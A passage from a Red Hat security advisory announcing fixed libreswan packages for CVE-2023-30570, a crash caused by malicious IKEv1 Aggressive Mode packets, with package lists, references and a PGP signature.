authentication and encryption services. These services allow you to build  
secure tunnels through untrusted networks such as virtual private network  
(VPN).

Security Fix(es):

* libreswan: Malicious IKEv1 Aggressive Mode packets can crash libreswan  
(CVE-2023-30570)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2187165 - CVE-2023-30570 libreswan: Malicious IKEv1 Aggressive Mode packets can crash libreswan

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

Source:  
libreswan-3.29-7.el8_1.2.src.rpm

aarch64:  
libreswan-3.29-7.el8_1.2.aarch64.rpm  
libreswan-debuginfo-3.29-7.el8_1.2.aarch64.rpm  
libreswan-debugsource-3.29-7.el8_1.2.aarch64.rpm

ppc64le:  
libreswan-3.29-7.el8_1.2.ppc64le.rpm  
libreswan-debuginfo-3.29-7.el8_1.2.ppc64le.rpm  
libreswan-debugsource-3.29-7.el8_1.2.ppc64le.rpm

s390x:  
libreswan-3.29-7.el8_1.2.s390x.rpm  
libreswan-debuginfo-3.29-7.el8_1.2.s390x.rpm  
libreswan-debugsource-3.29-7.el8_1.2.s390x.rpm

x86_64:  
libreswan-3.29-7.el8_1.2.x86_64.rpm  
libreswan-debuginfo-3.29-7.el8_1.2.x86_64.rpm  
libreswan-debugsource-3.29-7.el8_1.2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-30570  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZFPxuNzjgjWX9erEAQh+Dg//WziVZjrT5hdmWCcg1QyDTq/e0XzuSJ80  
v3wU/suF/3Iimen9qEFY5WGTziN1iIeQRzDD6BAV4OwEQzf0YKr8CviaRWNfRDSK  
G5EGKALl/AfUdDxQWR7f3IB4yGk/zokdPqHQNIxbM49lIChQaetdmB+wo4fJosyO  
EbDnx5EyrlErQeGRmsMmVosn4VVOJnG6RBLsfUWa/9FzZnepso/K2kA0NRRpzIEa  
+n76yUDSvX4/QbWpZ6zDeTiwY7g1JqRcNYT5Wqypd03/QyowrRT59FzsFm7/eI68  
dtlyiC2uszMJHb/wOgqHNCQ8NZ4lFMNSvrRyLNiC/FC6CoNa/2UsH5luUf3mngnd  
JDNkugJC1NcxUxmIAYm0ytgRS/hy/YyrcfuobMt1lAEAZm8rIJSvJ0gwNZiOghs4  
56GFwuk0WgEApYFSWU72Pp4SafHh8hkR6+1hdpdYo5f2gR9moxPCKQbuGy03Ti3r  
Hq6KyFnBjk+DxR0Bsja6ZMta4yBowicNNq8bF0yrYKOLLs8rmOXQEAleS99LijpI  
0hpRgUEiLakuUmn7bRE/ThJHwphI7lii2wON6efT8yPzNZVffk7kZpSW0HgX0a9o  
PHqY4IUgQjRr8jCR9yjNrAOZEvg6AI0qKnk/VrU1QfhdkQPmGXwEVi0QiuXMlizR  
lzLLoqFkfVc=  
=GVIo  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#js